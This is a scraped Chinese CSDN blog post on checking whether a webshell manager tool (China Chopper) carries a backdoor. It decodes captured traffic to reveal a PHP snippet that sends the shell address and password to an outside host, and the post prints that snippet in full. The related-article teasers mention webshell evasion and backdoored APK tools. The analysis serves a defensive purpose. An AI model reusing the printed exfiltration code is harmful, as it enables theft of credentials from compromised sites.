查看工具是否存在后门

最新推荐文章于 2024-01-24 22:05:56 发布

r0ckysec

最新推荐文章于 2024-01-24 22:05:56 发布

阅读量1.1k

点赞数

分类专栏：网络安全文章标签：网络安全

本文链接：https://blog.csdn.net/qq_36628940/article/details/95304890

版权

网络安全专栏收录该内容

2 篇文章 0 订阅

订阅专栏

查看工具是否存在后门

1、将工具打开（如：菜刀）连接上一个任务；

2、打开进程抓包工具 WSExplorer 或 WSockExpert 设置对菜刀捕获数据；
WSockExpert抓包教程可参考
https://www.cnblogs.com/mfrbuaa/p/4298594.html

3、对url数据进行解包

将上面获取的数据复制到Encode中，如图5所示，选择“URI”类型，单击“Decoder”进行解码；单击“Encoder”按钮对输入框中的内容进行编码。

将解码后的“z0=”后面的数据复制到Encode输入框中，选择base64解码，如图6所示

图6第一次base64解码

base64解码后的数据，在标红的部分还存在base64加密

将上面标红的部分的base64加密代码复制到Encode程序输入框中，选择base64进行Decode，如图7所示，获取其后门地址代码：

图7获取后门地址

if($_COOKIE['Lyke']!=1){setcookie('Lyke',1);@file('http://www.api.com.de /Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'& Pass='.key($_POST));}

其中

http://www.api.com.de/Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&Pass='.key($_POST)

为后门接收地址，在黑客打开webshell时会自动将shell地址和密码发送到网站www.api.com.de

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

r0ckysec

关注关注

0
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

shell后门查询工具

09-14

之前学习shell是使用的dos命令行查询，这个工具提供了可视化界面操作，用起来也很方便

如何检测软件后门

weixin_30666401的博客

05-06

1011

现在网络上的东西愈来愈不可信了。不论下载什么工具都得多个心眼，特别是经常玩黑的朋友。俗话说：常在河边走，哪有不湿鞋。弄不好哪天自己就中招了。下面我就简单分析下，如何判断软件是否有后门。。我把软件分为两大类：1.非黑*客系列软件（播放器、即时聊天工具） 2.黑*客系列软件（例如：啊D、S扫描器、**等）因为大家都知道...

参与评论您还未登录，请先登录后发表或查看评论

判断系统（服务器）中是否存在后门程序的2个工具

weixin_43456810的博客

12-22

2140

判断系统（服务器）中是否存在后门程序的2个工具 Chkrootkit 官网：http://www.chkrootkit.org 下载地址： ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz 安装： tar -zxvf chkrootkit.tar.gz cd chkrootkit make sense ./chkrootkit 如果发现检查结果中有infected以及其他代表有后门的词，则系统中可能有后门程序，需要检查一下。通过文件夹中的READ

常用网站木马文件后门检测工具

weixin_33682790的博客

04-08

2589

我们从网上下载web源码的时候有时会不小心下到带后门的程序，可以使用以下介绍的几款Webshell查杀工具来检测一下，软件查后门需多方对比，有能力请手动验证。资源来源于loc。一、D盾_Web查杀软件使用自行研发不分扩展名的代码分析引擎，能分析更为隐藏的WebShell后门行为。引擎特别针对一句话后门，变量函数后门，${}执行、preg_replace执行、call_user_func、...

如何判断***工具是否捆绑***和后门

weixin_33851604的博客

12-18

162

如何判断***工具是否捆绑***和后门 http://netsecurity.51cto.com2009-08-27 17:57 佚名华夏***联盟我要评论(0) 摘要：现在给大家分析一下如何判断***工具是否捆绑***和后门！标签：***后门***工具工具加壳现在给...

D盾网站源码后门木马检测工具

11-07

D盾是一款针对网站源码的安全检测工具，主要功能是查找并识别可能存在的后门、木马、病毒等恶意代码。它的出现，弥补了网站管理者在安全防护上的知识盲区，使得非专业人员也能轻松进行源码安全检测。二、D盾的核心...

隐蔽的ASP后门大家可以查看下

10-28

- 使用文本编辑器或特定的脚本检查工具，对网站的所有ASP文件进行关键词搜索。 - 检查ASP文件的修改日期，尤其是那些最近被修改的文件，可能是攻击者篡改了文件。 - 使用安全扫描工具进行漏洞扫描，这些工具可能会...

Linux下查找后门程序 CentOS 查后门程序的shell脚本

01-20

一般后门程序，在ps等进程查看工具里找不到，因为这些常用工具甚至系统库在系统被入侵之后基本上已经被动过手脚（网上流传着大量的rootkit。假如是内核级的木马，那么该方法就无效了）。因为修改系统内核相对复杂...

侠客密码查看工具无毒无后门

06-11

【标题】：“侠客密码查看工具无毒无后门”是指这款软件是安全的，不包含任何病毒或恶意后门程序，用户可以放心使用。它主要用于帮助用户查看和管理他们的系统密码，包括但不限于宽带拨号密码。【描述】：“无毒的...

通过 GScan 工具自动排查后门

weixin_44143876的博客

01-24

902

安全应急响应提供便利的工具

md后门工具

06-21

MDm.exe是一个后门工具，可以下载使用。。

网站后门辅查工具不让人在你网站有后门

05-24

不让人在你网站有后门 v0.1tool_setup.exe

linux查找后门脚本,Linux下查找后门程序 CentOS 查后门程序的shell脚本

weixin_35723435的博客

04-30

702

Linux下查找后门程序 CentOS 查后门程序的shell脚本每个进程都会有一个PID，而每一个PID都会在/proc目录下有一个相应的目录，这是linux(当前内核2.6)系统的实现。一般后门程序，在ps等进程查看工具里找不到，因为这些常用工具甚至系统库在系统被入侵之后基本上已经被动过手脚(网上流传着大量的rootkit。假如是内核级的木马，那么该方法就无效了)。因为修改系统内核相对复杂(假...

安卓后门工具：backdoor-apk 教程

Sumarua的博客

07-26

7453

文章目录安卓后门工具：backdoor-apk 教程backdoor-apk 下载、安装、使用教程1、下载backdoor-apk2、下载完成后我们进入到其文件目录下：3、在当前目录下，我们可以看到一个脚本文件。4、Android清单权限选项：如何判断后门APK是否生成成功？5、成功执行以上操作后，会生成一个绑定后门的 secist.apk 文件，默认被保存在 backdoor-apk>>original>>dist 目录下！下面我们来启动侦听：6、同时，我将生成的带有后门的 AP

五大后门连接工具&木马免杀初级思路

weixin_54882883的博客

08-25

1254

在我们上传木马的时候，经常会遇到木马查杀，木马上传上去了突然被杀了删除了，有时候木马上传了，但是连不上去，这是在getshell中经常遇到的问题，那么当遇到这种问题，就需要让木马绕过网站上WAF的一些查杀等等问题了。那么这个时候POST还需将我们要执行的代码命令等等进去传送给assert函数。但是eval不能直接在URL中添加所以用assert来代替。其实assert和eval的功能上是差不多。检测机制检测就是未知代码不知道。为什么e=assert呢。那么这个地址就是后门地址。加密其实就是把木马加密了。..

JavaWeb后门(webshell)基础

st3pby的博客

12-25

2148

最著名的莫过于 PHP 的各种奇思妙想的后门，但与 PHP 不同的是，Java 是强类型语言，语言特性较为严格，不能够像 PHP 那样利用字符串组合当作系统函数使用，但即便如此，随着安全人员的进一步研究，依旧出现了很多奇思妙想的 JSP Webshell。Java是一种通用的计算机编程语言，它是并发的，基于类的，面向对象的，并且专门设计为具有尽可能少的实现依赖性。利用这个特性我们可以操作类名，从而达到躲避检测的目的。jsp的后缀可以兼容为jspx的代码，也兼容jspx的所有特性，如CDATA特性。

linux怎么查找后门文件